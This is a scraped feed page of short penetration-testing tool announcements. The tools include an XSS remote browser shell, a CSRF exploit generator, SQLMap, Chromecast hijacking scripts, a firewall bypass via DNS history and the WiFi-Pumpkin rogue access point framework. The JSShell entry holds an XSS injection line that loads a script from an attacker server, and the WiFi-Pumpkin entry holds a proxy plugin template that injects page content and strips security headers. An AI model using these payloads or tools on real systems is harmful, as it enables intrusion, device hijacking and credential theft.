Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5839 articles
Browse latest View live

SiteBroker - A Cross-Platform Python Based Utility For Information Gathering And Penetration Testing Automation!

January 3, 2019, 12:41 pm
$
0
0

A cross-platform python based utility for information gathering and penetration automation!

Output
Sitebroker's Full Output

Requirements
  • Python (2.7.*)
  • Python pip
  • Python module requests
  • Python module colorama
  • Python module dnspython
  • Python module lxml
  • Python module bs4

Install modules
pip install -r requirements.txt

Tested on
  • Windows 7/8/8.1
  • Kali linux (2017.2)

Download SiteBroker
You can download the latest version of SiteBroker by cloning the GitHub repository.
git clone https://github.com/Anon-Exploiter/SiteBroker

Updates
  • Changed The Whole Script Into Python (Previously It Was Written In PHP)
  • Exceptions Covered for both User Interrupting && Internel Issues!
  • Removed NetCraft Module as We need to use selinium and phantomJS for it (Ultimately making script slow!)
  • Changed the Problem Of Responce Code Of '200' for most sites in Admin Panel Finder Module && Shell Finder Module

Change-log
  • Added New Features For Reverse IP (Via HackerTarget&& YouGetSignal)
  • Added New Features For Crawling (Via Google, Bing && Manually With My Hands ;)
  • Added New Method For Subdomains Scanning! (Takes Some Time Though :p)

Usage
Initializing Script
python SiteBroker.py

Advanced Usage

Author: Syed Umar Arfeen (An0n 3xPloiTeR)

Usage: python SiteBroker.py
A cross-platform python based utility for information gathering and penetration automation!

Options:

 1). Cloudflare Bypass. 
 2). Website Crawler.
    |____ Google Based Crawling
   |____ Bing Based Crawling
   |____ Manually Crawling
 3). Reverse IP.
    |____ YouGetSignal Based
   |____ HackerTarget's API Based
 4). Information Gathering.
    |____ Whois Lookup
   |____ BrowserSpy Report
 5). Nameservers.
 6). WebSite Speed.
 7). Subdomains Scanner
 8). Shell Finder.
 9). Admin Panel Finder.
 10). Grab Banner.
 11). All Things.

  Example:
 python SiteBroker.py

Screenshots








Search

XSRFProbe - The Prime Cross Site Request Forgery Audit And Exploitation Toolkit

January 4, 2019, 4:34 am
$
0
0

XSRFProbe is an advanced Cross Site Request Forgery (CSRF/XSRF) Audit and Exploitation Toolkit. Equipped with a Powerful Crawling Engine and Numerous Systematic Checks, it is now able to detect most cases of CSRF vulnerabilities, their related bypasses and futher generate (maliciously) exploitable proof of concepts with each found vulnerability. For more info on how XSRFProbe works, see XSRFProbe Internals on wiki.

Some Features:
  • Performs several types of checks before declaring an endpoint as vulnerable.
  • Can detect several types of Anti-CSRF tokens in POST requests.
  • Features a powerful crawler which features continuous crawling and scanning.
  • Out of the box support for custom cookie values and generic headers.
  • Accurate Token-Strength Detection and Analysis using various algorithms.
  • Can generate both normal as well as maliciously exploitable CSRF PoCs.
  • Follows a redirect when there is a 30x response.
  • Well documented code and highly generalised automated workflow.
  • The user is in control of everything whatever the scanner does.
  • Has a user-friendly interaction environment with full verbose support.
  • Detailed logging system of errors, vulnerabilities, tokens and other stuffs.

Gallery:
Lets see some real-world scenarios of XSRFProbe in action:






Warnings:
Do not use this tool on a live site!
It is because this tool is designed to perform all kinds of form submissions automatically which can sabotage the site. Sometimes you may screw up the database and most probably perform a DoS on the site as well.
Test on a disposable/dummy setup/site!

Disclaimer:
Usage of XSRFProbe for testing websites without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. The author assumes no liability and is not exclusively responsible for any misuse or damage caused by this program.

Author's Words:
This project is based entirely upon my own research and my own experience with web applications on Cross-Site Request Forgery attacks. You can try going through the source code which is highly documented to help you understand how this toolkit was built. Useful pull requests, ideas and issues are highly welcome. If you wish to see what how XSRFProbe is being developed, check out the Development Board.
Thats it folks. Thank you...
Copyright © Infected Drake


Kalitorify - Transparent Proxy Through Tor For Kali Linux OS

January 4, 2019, 12:22 pm
$
0
0

kalitorify is a shell script for Kali Linux which use iptables settings for transparent proxy through Tor, the program also allows you to perform various checks like checking the external ip, or if Tor has been configured correctly.

What is Transparent Proxy?
Also known as an intercepting proxy, inline proxy, or forced proxy, a transparent proxy intercepts normal communication at the network layer without requiring any special client configuration. Clients need not be aware of the existence of the proxy. A transparent proxy is normally located between the client and the Internet, with the proxy performing some of the functions of a gateway or router.
Strictly speaking, with kalitorify you can redirect all traffic of your Kali Linux operating system through Tor.
In the Tor project wiki you find an explanation of what is the "transparent proxy through tor" and related settings.

Recommendations
kalitorify is produced independently from the Tor anonimity software and carries no guarantee from the Tor Project about quality, suitability or anything else, please read these documents to know how to use the Tor network safely:
Tor General FAQ
Whonix Do Not recommendations

Install

Install dependencies:
sudo apt update && sudo apt full-upgrade -y

sudo apt install tor -y

Install kalitorify and reboot:
git clone https://github.com/brainfucksec/kalitorify

cd kalitorify/

sudo make install

sudo reboot

Usage
kalitorify [option]

Options
-t, --tor
start transparent proxy through tor
-c, --clearnet
reset iptables and return to clearnet navigation
-s, --status
check status of program and services
-i, --ipinfo
show public IP
-r, --restart
restart tor service and change IP


JSShell - An Interactive Multi-User Web JS Shell

January 5, 2019, 4:59 am
$
0
0
An interactive multi-user web based javascript shell. It was initially created in order to debug remote esoteric browsers during experiments and research. This tool can be easily attached to XSS (Cross Site Scripting) payload to achieve browser remote code execution (similar to the BeeF framework).
Version 2.0 is created entirely from scratch, introducing new exciting features, stability and maintainability.

Author
Daniel Abeles.

Shell Video


Features
  • Multi client support
  • Cyclic DOM objects support
  • Pre flight scripts
  • Command Queue & Context
  • Extensible with Plugins
  • Injectable via <script> tags
  • Dumping command output to file
  • Shell pagination

Installation & Setup

Config File
In the resources directory, update the config.json file with your desired configuration:
  • Database host - if running with the docker deployment method, choose the database host as db (which is the internal host name).
  • Return URL - the URL which the requests will follow. The shell.js file does some AJAX calls to register and poll for new commands. Usually it will be http://{YOUR_SERVER_IP}:{PORT}.
  • Startup script - a script that runs automatically when the JSShell CLI client is spawned.
  • It is also possible to point at a remote database if desired.

Docker
This new version instructed installing and running via docker and docker-compose. Now, to install and run the entire JSShell framework, simply run:
$ ./start_docker_shell.sh
This will:
  • Start and create the database in the background
  • Start the web API server that handles incoming connections in the background
  • Spawn a new instance of the JSShellcommand line interface container

Regular
If you still want to use the old fashion method of installing, simply make sure you have a MongoDB database up and running, and update the config.json file residing in the resources directory.
I recommend using a virtual environment with pyenv:
$ pyenv virtualenv -p python3.6 venv
$ pyenv activate venv
Or using virtualenv:
$ virtualenv -p python3.6 venv
$ source venv/bin/activate
Then, install the requirements:
$ pip install -r requirements.txt

Running
If you used the docker method, there's no need to run the following procedure.

Web Server
Otherwise, once we have the database setup, we need to start the web API server. To do, run:
$ python manage.py web
This will create and run a web server that listens to incoming connections and serves our JSShell code.

Shell
Now to start the JSShell CLI, run the same script but now with the shell flag:
$ python manage.py shell

Usage
After setup and running the required components, enter the help command to see the available commands:
╦╔═╗┌─┐┬ ┬┌─┐┬  ┬  
║╚═╗└─┐├─┤├┤ │  │  
╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0     
        by @Daniel_Abeles

>> help

Documented commands (type help <topic>):

General Commands
--------------------------------------------------------------------------------
edit                Edit a file in a text editor
help                List available commands or provide detailed help for a specific command
history             View, run, edit, save, or clear previously entered commands
ipy                 Enter an interactive IPython shell
py                  Invoke Python command or shell
quit                Exit this application

Shell Based Operations
--------------------------------------------------------------------------------
back                Un-select the current selected client
clients             List and control the clients that have registered to our system
commands            Show the executed commands on the selected client
dump                Dumps a command to the disk
execute             Execute commands on the selected client
select              Select a client as the current client

>>

Flow
JSShell supports 2 methods of operation:
  1. Injectable Shell (similar to BeeF framework)
  2. Hosted Shell (for debugging)

Injectable Shell
Similar to other XSS control frameworks (like BeeF), JSShell is capable of managing successful XSS exploitations. In example, if you can inject a script tag, inject the following resource to your payload, and a new client will appear in your console:
<script src="http://{YOUR_SERVER_IP}:{PORT}/content/js"></script>

Hosted Shell
If you desire to debug exotic and esoteric browsers, you can simply navigate to http://{YOUR_SERVER_IP}:{PORT}/ and a new client will pop up into your JSShell CLI client. Now it is debuggable via our JSShell console.

Credits
Canop for JSON.prune

use it at your own responsibility and risk.


PRETty - "PRinter Exploitation Toolkit" LAN Automation Tool

January 5, 2019, 1:36 pm
$
0
0

PRETty is useful when a large number of printers are present on a network. Instead of scanning, logging, and manually running PRET againt each individual printer, PRETty will automatically discover and run choosen PRET payloads against all printers on the target network. Additionally, PRETty can be used to automate command/payload delivery to any given list of printers (See the "Lists" section)

GUIDE:

Installation
  1. Install PRET and all required dependencies
  2. Install requirements: sudo pip install termcolor
  3. Navigate to where you installed PRET: cd $PRET
  4. Install PRETty into PRET: git clone https://github.com/BusesCanFly/PRETty
  5. Navigate to PRETty: cd PRETty
  6. Make PRETty executable: chmod +x PRETty.py
  • One line variant (from PRET folder): sudo pip install termcolor && git clone https://github.com/BusesCanFly/PRETty && cd PRETty && chmod +x PRETty.py

Lists
  • PRETty automatically scans the LAN for HP printers and creates an IP list for itself
    • However, you can place custom IP lists in PRETty/IP/
  • PRETty comes with pre-made command files for PRET located in PRETty/commands/
    • However, you can place additional command files in PRETty/commands/

Usage
  1. Run PRETty with ./PRETty.py and follow the prompts :D

Shodanploit - Shodan Command Line Interface Written In Python

January 6, 2019, 5:32 am
$
0
0

Shodan is a search engine on the internet where you can find interesting things all over the world. For example, we can find cameras, bitcoin streams, zombie computers, ports with weakness in service, SCADA systems, and more. Moreover, more specific searches are possible. As a result of the search, Shodan shows us the number of vulnerable hosts on Earth.

So what does shodansploit do ?
With Shodan Exploit, you will have all your calls on your terminal. It also allows you to make detailed searches.
All you have to do without running Shodansploiti is to add shodan api.

Note :
The quality of the search will change according to the api privileges you have used.


Shodan API Documention :

Shodan API Specification :
The banner is the main type of information that Shodan provides through the REST and Streaming API. This document outlines the various properties that are always present and which ones are optional.
The exploit type contains the normalized data from a variety of vulnerability data sources. The Exploits REST API returns this type for its search results. This document outlines the various properties that are always present and which ones are optional.

Programming Languages :
  • Python

System :
  • Linux
  • Windows

RUN
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/shodansploit.git
root@ismailtasdelen:~# cd shodansploit
root@ismailtasdelen:~/shodansploit# python shodansploit.py

What's on the tool menu ?
[1] GET > /shodan/host/{ip} 
[2] GET > /shodan/host/count
[3] GET > /shodan/host/search 
[4] GET > /shodan/host/search/tokens 
[5] GET > /shodan/ports 

[6] GET > /shodan/exploit/author
[7] GET > /shodan/exploit/cve
[8] GET > /shodan/exploit/msb
[9] GET > /shodan/exploit/bugtraq-id
[10] GET > /shodan/exploit/osvdb
[11] GET > /shodan/exploit/title
[12] GET > /shodan/exploit/description
[13] GET > /shodan/exploit/date
[14] GET > /shodan/exploit/code
[15] GET > /shodan/exploit/platform
[16] GET > /shodan/exploit/port

[17] GET > /dns/resolve
[18] GET > /dns/reverse 
[19] GET > /labs/honeyscore/{ip}

[20] GET > /account/profile 
[21] GET > /tools/myip 
[22] GET > /tools/httpheaders
[23] GET > /api-info 

[24] Exit

Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/shodansploit.git

Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/ismailtasdelen.git

Contact :
Mail : ismailtasdelen@protonmail.com
Linkedin : https://www.linkedin.com/in/ismailtasdelen/
GitHub : https://github.com/ismailtasdelen/
Telegram : https://t.me/ismailtasdelen/


Exrex - Irregular Methods On Regular Expressions

January 6, 2019, 12:58 pm
$
0
0

Exrex is a command line tool and python module that generates all - or random - matching strings to a given regular expression and more. It's pure python, without external dependencies.
There are regular expressions with infinite matching strings (eg.: [a-z]+), in these cases exrex limits the maximum length of the infinite parts.
Exrex uses generators, so the memory usage does not depend on the number of matching strings.

Features
  • Generating all matching strings
  • Generating a random matching string
  • Counting the number of matching strings
  • Simplification of regular expressions

Installation
To install exrex, simply:
$ pip install exrex
or
$ easy_install exrex

Usage

as python module
>>> import exrex

>>> exrex.getone('(ex)r\\1')
'exrex'

>>> list(exrex.generate('((hai){2}|world!)'))
['haihai', 'world!']

>>> exrex.getone('\d{4}-\d{4}-\d{4}-[0-9]{4}')
'3096-7886-2834-5671'

>>> exrex.getone('(1[0-2]|0[1-9])(:[0-5]\d){2} (A|P)M')
'09:31:40 AM'

>>> exrex.count('[01]{0,9}')
1023

>>> print '\n'.join(exrex.generate('This is (a (code|cake|test)|an (apple|elf|output))\.'))
This is a code.
This is a cake.
This is a test.
This is an apple.
This is an elf.
This is an output.

>>> print exrex.simplify('(ab|ac|ad)')
(a[bcd])

Command line usage
> exrex --help
usage: exrex.py [-h] [-o FILE] [-l] [-d DELIMITER] [-v] REGEX

exrex - regular expression string generator

positional arguments:
  REGEX                 REGEX string

optional arguments:
  -h, --help            show this help message and exit
  -o FILE, --output FILE
                        Output file - default is STDOUT
  -l N, --limit N       Max limit for range size - default is 20
  -c, --count           Count matching strings
  -m N, --max-number N  Max number of strings - default is -1
  -r, --random          Returns a random string that matches to the regex
  -s, --simplify        Simplifies a regular expression
  -d DELIMITER, --delimiter DELIMITER
                        Delimiter - default is \n
  -v, --verbose         Verbose mode
Examples:
$ exrex '[asdfg]'
a
s
d
f
g

$ exrex -r '(0[1-9]|1[012])-\d{2}'
09-85

$ exrex '[01]{10}' -c
1024
Documentation
http://exrex.readthedocs.org/en/latest/

Fun/arts
  • Boat: exrex '( {20}(\| *\\|-{22}|\|)|\.={50}| ( ){0,5}\\\.| {12}~{39})'
  • Eyes: exrex '(o|O|0)(_)(o|O|0)'

Similar projects
Tools that generate a list of all possible strings that match a given pattern:
  • regldg (features a live demo on the website)
  • regex-genex (supports using multiple regex patterns simultaneously)
Tools that generate random strings, one by one, that match a given pattern:
  • randexp.js (features several live demos on the website)
  • rstr.xeger (a method of the rstr Python module)

Profiling
  • python -m cProfile exrex.py '[a-zA-Z][a-zA-Z][a-zA-Z][a-zA-Z]' -o /dev/null
  • python -m cProfile exrex.py '[0-9]{6}' -o /dev/null


Crashcast-Exploit - This Tool Allows You Mass Play Any YouTube Video With Chromecasts Obtained From Shodan.io

January 7, 2019, 4:46 am
$
0
0

This tool allows you to mass play any YouTube video with Chromecasts obtained from Shodan.io

Prerequisites
The only thing you need installed is Python 3.x
sudo apt-get install python3
You also require to have cURL installed
sudo apt-get install curl
You also require Shodan python module
pip install shodan

Using Shodan API
This tool requires you to own an upgraded Shodan API
You may obtain one for free in Shodan if you sign up using a .edu email





Search

Tool-X - A Kali Linux Hacking Tool Installer

January 7, 2019, 12:46 pm
$
0
0

What is Tool-X ?
Tool-X is a kali linux hacking Tool installer. Tool-X is Developed By Rajkumar Dusad. with the help of Tool-X you can install best hacking tools in Rooted or Non Rooted Android devices. In the Tool-X there are almost 240 hacking tools available for termux app and GNURoot Debian terminal. you can install any tool by single click. Tool-X is Specially made for Termux and GNURoot Debian Terminal. Now Tool-X is available for Ubuntu.

How to use ?
  • Type 0 : To install all tools.
  • Type 1 : to sow all available tools and type the number of a tool which you want to install.
  • Type 2 : to show tools category.
  • Type 3 : for install operating system in termux
  • Type 4 : if you want to update Tool-X.
  • Type 5 : if you know About us.
  • Type x : for exit.


Tool-X is available for
  • Android
  • Ubuntu

How to Install in termux ?
Open the termux app and type following commands.
  • apt update
  • pkg install git
  • git clone https://github.com/Rajkumrdusad/Tool-X.git
  • cd Tool-X
  • chmod +x install.aex
  • sh install.aex if not work than type ./install.aex

Now Tool-X is installed successfully. To run Tool-X Type Tool-X
Now type Tool-X from anywhare in your terminal to open Tool-X.


How to Install in GNURoot Debian Terminal ?
Open the GNURoot Debian app and type following commands.
  • apt update
  • apt install git
  • cd && git clone https://github.com/Rajkumrdusad/Tool-X.git
  • cd Tool-X
  • chmod +x install.aex
  • sh install.aex if not work than type ./install.aex

Now Tool-X is installed successfully. To run Tool-X Type Tool-X
Now type Tool-X from anywhare in your terminal to open Tool-X. But use this tool only for legal purpose.


How to install in Ubuntu ?
  • sudo apt-get Update
  • sudo apt-get install git
  • sudo git clone https://github.com/Rajkumrdusad/Tool-X.git
  • cd Tool-X
  • chmod +x install.aex
  • sudo sh install.aex OR ./install.aex

Now Tool-X is installed successfully. To run Tool-X Type Tool-X
Now type Tool-X from anywhare in your terminal to open Tool-X. But use this tool only for legal purpose.


SQLMap v1.3 - Automatic SQL Injection And Database Takeover Tool

January 8, 2019, 4:07 am
$
0
0

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation
You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage
To get a list of basic options and switches use:
python sqlmap.py -h
To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.

Demo

Links

Translations


Stretcher - Tool Designed To Help Identify Open Elasticsearch Servers That Are Exposing Sensitive Information

January 8, 2019, 12:45 pm
$
0
0

Stretcher is a tool to search for open elasticsearch servers.

Usage: python stretcher.py --shodan {key}  --action analyze --threads {0..100} --dork 
       python stretcher.py  --help 
   _____ __            __       __             
  / ___// /_________  / /______/ /_  ___  _____
  \__ \/ __/ ___/ _ \/ __/ ___/ __ \/ _ \/ ___/
 ___/ / /_/ /  /  __/ /_/ /__/ / / /  __/ /    
/____/\__/_/   \___/\__/\___/_/ /_/\___/_/     



 Tool designed to help identify incorrectly
 Applications that are exposing sensitive


[+] Interesting indexes were found payment, address, email, user

 Browser: http://34.224.104.129:80
 Organization: Amazon.com
 Hostnames: ec2-34-224-104-129.compute-1.amazonaws.com
 Domains: amazonaws.com
 City: Ashburn
 Country: United States
 Status: Without authentication (Open)

Installation
$ sudo pip3 install pyfiglet shodan elasticsearch 
$ cd $HOME/
$ git clone https://github.com/6IX7ine/stretcher/
$ sudo chmod -R 777 stretcher/

Disclaimer
Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.


Aztarna - A Footprinting Tool For Robots

January 9, 2019, 4:51 am
$
0
0



This repository contains Alias Robotics' aztarna, a footprinting tool for robots.
Alias Robotics supports original robot manufacturers assessing their security and improving their quality of software. By no means we encourage or promote the unauthorized tampering with running robotic systems. This can cause serious human harm and material damages.

For ROS
  • A list of the ROS nodes present in the system (Publishers and Subscribers)
  • For each node, the published and subscribed topis including the topic type
  • For each node, the ROS services each of the nodes offer
  • A list of all ROS parameters present in the Parameter Server
  • A list of the active communications running in the system. A single communication includes the involved publiser/subscriber nodes and the topics

For SROS
  • Determining if the system is a SROS master.
  • Detecting if demo configuration is in use.
  • A list of the nodes found in the system. (Extended mode)
  • A list of allow/deny policies for each node.
    • Publishable topics.
    • Subscriptable topics.
    • Executable services.
    • Readable parameters.

For Industrial routers
  • Detecting eWON, Moxa, Sierra Wireless and Westermo industrial routers.
  • Default credential checking for found routers.

Installing

For production
Direcly from PyPi
pip3 install aztarna
or from the repository:
pip3 install .

For development
pip3 install -e .
or
python3 setup.py develop
Python 3.7 and the setuptools package is required for installation.

Install with docker
docker build -t aztarna_docker .

Code usage:
usage: aztarna [-h] -t TYPE [-a ADDRESS] [-p PORTS] [-i INPUT_FILE]
               [-o OUT_FILE] [-e] [-r RATE] [--shodan] [--api-key API_KEY]

Aztarna

optional arguments:
  -h, --help            show this help message and exit
  -t TYPE, --type TYPE  <ROS/ros/SROS/sros/IROUTERS/irouters> Scan ROS, SROS
                        hosts or Industrial routers
  -a ADDRESS, --address ADDRESS
                        Single address or network range to scan.
  -p PORTS, --ports PORTS
                        Ports to scan (format: 13311 or 11111-11155 or
                        1,2,3,4)
  -i INPUT_FILE, --input_file INPUT_FILE
                        Input file of addresses to use for scanning
  -o OUT_FILE, --out_file OUT_FILE
                        Output file for the results
  -e, --extended        Extended scan of the hosts
  -r RATE, --rate RATE  Maximum simultaneous network connections
  --shodan              Use shodan for the scan types that support it.
  --api-key API_KEY     Shodan API Key

Run the code (example input file):
aztarna -t ROS -p 11311 -i ros_scan_s20.csv

Run the code with Docker (example input file):
docker run -v <host_path>:/root -it aztarna_docker -t ROS -p 11311 -i <input_file>

Run the code (example single ip address):
aztarna -t ROS -p 11311 -a 115.129.241.241

Run the code (example subnet):
aztarna -t ROS -p 11311 -a 115.129.241.0/24

Run the code (example single ip address, port range):
aztarna -t ROS -p 11311-11500 -a 115.129.241.241

Run the code (example single ip address, port list):
aztarna -t ROS -p 11311,11312,11313 -a 115.129.241.241

Run the code (example piping directly from zmap):
zmap -p 11311 0.0.0.0/0 -q | aztarna -t SROS -p 11311

Run the code (example search for industrial routers in shodan)
aztarna -t IROUTERS --shodan --api-key <yourshodanapikey>

Run the code (example search for industrial routers in shodan, piping to file)
aztarna -t IROUTERS --shodan --api-key <yourshodanapikey> -o routers.csv


Hediye - Hash Generator & Cracker Online Offline

January 9, 2019, 1:03 pm
$
0
0

Hash Generator & Cracker Online Offline suported hash:
  • md5
  • sha1
  • sha224
  • sha256
  • sha384
  • sha512

Install Note
Clone the repository:
git clone https://github.com/0xR0/hediye.git
Then go inside:
cd hediye/
use examples:
python3 hediye.py -k Key / For --> Generate Hash (md5, sha1, sha224, sha256, sha384, sha512)
python3 hediye.py -v HASH -f Wordlist / For --> Brute Force Attack
python3 hediye.py -n HASH / For --> Online Search

Generate Hash
python3 hediye.py -k 4617165


Brute Force Attack


Online Search



Killcast - Manipulate Chromecast Devices In Your Network

January 10, 2019, 4:13 am
$
0
0

Manipulate Chromecast Devices in your Network.

Inspiration - Thousands of Google Chromecast Devices Hijacked to Promote PewDiePie
This tool is a Proof of Concept and is for Research Purposes Only, killcast shows how Chromecast devices can be easily manipulated and hijacked by anyone.

Features
  • Extract Interesting Information such as Build Version, Country, Timezone etc
  • Rename
  • Reboot
  • Perform Factory Reset
  • Kill Active Applications such as YouTube, Netflix and Google Play Music

What is not working
  • Play any YouTube Video
  • Unable to kill Play Music
  • Other things that we are not aware of ;)

Tested On :
  • Kali Linux 2019.1
  • Ubuntu 18.04
  • Termux

Installation

Ubuntu / Kali Linux / Termux
git clone https://github.com/thewhiteh4t/killcast.git
cd killcast
apt-get install python3
pip install requests

Usage
python3 killcast.py -h

usage: killcast.py [-h] -t IP

Manipulate Chromecast Devices in your Network

optional arguments:
  -h, --help      show this help message and exit
  -t IP, --ip IP  IP Address of Chromecast
python3 killcast.py -t 192.168.0.100

Demo



bypass-firewalls-by-DNS-history - Firewall Bypass Script Based On DNS History Records

January 10, 2019, 12:35 pm
$
0
0

This script will try to find:
  • the direct IP address of a server behind a firewall like Cloudflare, Incapsula, SUCURI ...
  • an old server which still running the same (inactive and unmaintained) website, not receiving active traffic because the A DNS record is not pointing towards it. Because it's an outdated and unmaintained website version of the current active one, it is likely vulnerable for various exploits. It might be easier to find SQL injections and access the database of the old website and abuse this information to use on the current and active website.

This script (ab)uses DNS history records. This script will search for old DNS A records and check if the server replies for that domain. It also outputs a confidence level, based on the similarity in HTML response of the possible origin server and the firewall.

Usage
Use the script like this:
bash bypass-firewalls-by-DNS-history.sh -d example.com
  • -d --domain: domain to bypass
  • -o --outputfile: output file with IP's
  • -l --listsubdomains: list with subdomains for extra coverage

Requirements (optional)
jq is needed to parse output to gather automatically subdomains. Install with apt install jq.

For who is this script?
This script is handy for:
  • Security auditors
  • Web administrators
  • Bug bounty hunters
  • Blackhatters I guess ¯\_(ツ)_/¯

How to protect against this script?
  • If you use a firewall, make sure to accept only traffic coming through the firewall. Deny all traffic coming directly from the internet. For example: Cloudflare has a list of IP's which you can whitelist with iptables or UFW. Deny all other traffic.
  • Make sure that no old servers are still accepting connections and not accessible in the first place

Web services used in this script
The following services were used:
  • securitytrails.com
  • certspotter.com

Tags
WAF bypass
Web Application Firewall bypass
DNS History
find direct/origin IP website


Search

WiFi-Pumpkin v0.8.7 - Framework for Rogue Wi-Fi Access Point Attack

January 11, 2019, 4:04 am
$
0
0

The WiFi-Pumpkin is a rogue AP framework to easily create these fake networks, all while forwarding legitimate traffic to and from the unsuspecting target. It comes stuffed with features, including rogue Wi-Fi access points, deauth attacks on client APs, a probe request and credentials monitor, transparent proxy, Windows update attack, phishing manager, ARP Poisoning, DNS Spoofing, Pumpkin-Proxy, and image capture on the fly. moreover, the WiFi-Pumpkin is a very complete framework for auditing Wi-Fi security check the list of features is quite broad.

Installation
  • Python 2.7
 git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
 cd WiFi-Pumpkin
 ./installer.sh --install
or download .deb file to install
sudo dpkg -i wifi-pumpkin-0.8.7-all.deb
sudo apt-get -f install # force install dependencies if not install normally
refer to the wiki for Installation

Features
  • Rogue Wi-Fi Access Point
  • Deauth Attack Clients AP
  • Probe Request Monitor
  • DHCP Starvation Attack
  • Credentials Monitor
  • Transparent Proxy
  • Windows Update Attack
  • Phishing Manager
  • Partial Bypass HSTS protocol
  • Support beef hook
  • ARP Poison
  • DNS Spoof
  • Patch Binaries via MITM (BDF-Proxy)
  • LLMNR, NBT-NS and MDNS poisoner (Responder)
  • Pumpkin-Proxy (ProxyServer (mitmproxy API))
  • Capture images on the fly
  • TCP-Proxy (with scapy)
  • Moduled plugins and proxys
  • Wireless Mode support hostapd-mana/hostapd-karma attacks

Plugins
PluginDescription
Dns2proxyThis tools offer a different features for post-explotation once you change the DNS server to a Victim.
Sstrip2Sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks based version fork @LeonardoNve/@xtr4nge.
Sergio_proxySergio Proxy (a Super Effective Recorder of Gathered Inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework.
BDFProxyPatch Binaries via MITM: BackdoorFactory + mitmProxy, bdfproxy-ng is a fork and review of the original BDFProxy @secretsquirrel.
ResponderResponder an LLMNR, NBT-NS and MDNS poisoner. Author: Laurent Gaffie

Transparent Proxy


Transparent proxies(mitmproxy) that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "plugins/extension/" automatically will be listed on Pumpkin-Proxy tab.

Plugins Example Dev
from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate

class Nameplugin(PluginTemplate):
   meta = {
       'Name'      : 'Nameplugin',
       'Version'   : '1.0',
       'Description' : 'Brief description of the new plugin',
       'Author'    : 'by dev'
   }
   def __init__(self):
       for key,value in self.meta.items():
           self.__dict__[key] = value
       # if you want set arguments check refer wiki more info.
       self.ConfigParser = False # No require arguments

   def request(self, flow):
       print flow.__dict__
       print flow.request.__dict__
       print flow.request.headers.__dict__ # request headers
       host = flow.request.pretty_host # get domain on the fly requests
       versionH = flow.request.http_version # get http version

       # get redirect domains example
       # pretty_host takes the "Host" header of the request into account,
       if flow.request.pretty_host == "example.org":
           flow.request.host = "mitmproxy.org"

       # get all request Header example
       self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
       for name, valur in flow.request.headers.iteritems():
           self.send_output.emit('{}: {}'.format(name,valur))

       print flow.request.method # show method request
       # the model printer data
       self.send_output.emit('[NamePlugin]:: this is model for save data logging')

   def response(self, flow):
       print flow.__dict__
       print flow.response.__dict__
       print flow.response.headers.__dict__ #convert headers for python dict
       print flow.response.headers['Content-Type'] # get content type

       #every HTTP response before it is returned to the client
       with decoded(flow.response):
           print flow.response.content # content html
           flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag

       del flow.response.headers["X-XSS-Protection"] # remove protection Header

       flow.response.headers["newheader"] = "foo" # adds a new header
       #and the new header will be added to all responses passing through the proxy

About plugins
plugins on the wiki

TCP-Proxy Server
A proxy that you can place between in a TCP stream. It filters the request and response streams with (scapy module) and actively modify packets of a TCP protocol that gets intercepted by WiFi-Pumpkin. this plugin uses modules to view or modify the intercepted data that possibly easiest implementation of a module, just add your custom module on "plugins/analyzers/" automatically will be listed on TCP-Proxy tab.
from scapy.all import *
from scapy_http import http # for layer HTTP
from default import PSniffer # base plugin class

class ExamplePlugin(PSniffer):
    _activated     = False
    _instance      = None
    meta = {
        'Name'      : 'Example',
        'Version'   : '1.0',
        'Description' : 'Brief description of the new plugin',
        'Author'    : 'your name',
    }
    def __init__(self):
        for key,value in self.meta.items():
            self.__dict__[key] = value

    @staticmethod
    def getInstance():
        if ExamplePlugin._instance is None:
